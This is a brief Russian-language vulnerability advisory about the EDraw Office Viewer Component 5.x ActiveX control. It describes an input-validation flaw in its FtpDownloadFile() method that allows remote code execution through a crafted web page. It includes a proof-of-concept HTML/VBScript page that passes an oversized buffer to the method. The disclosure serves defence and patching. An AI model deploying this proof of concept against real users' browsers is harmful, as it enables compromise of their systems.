Программа: EDraw Office Viewer Component 5.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в EDraw.OfficeViewer (officeviewer.ocx) ActiveX компоненте при обработке аргументов в методе "FtpDownloadFile()". Атакующий может обманным образом заманить пользователя на специально составленный сайт, что приведет к выполнению произвольного кода.
Пример:
<object classid='clsid:6BA21C22-53A5-463F-BBE8-5CF7FFA0132B' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
buff = String(25000, "A")
test.FtpDownloadFile buff, buff
End Sub
</script>
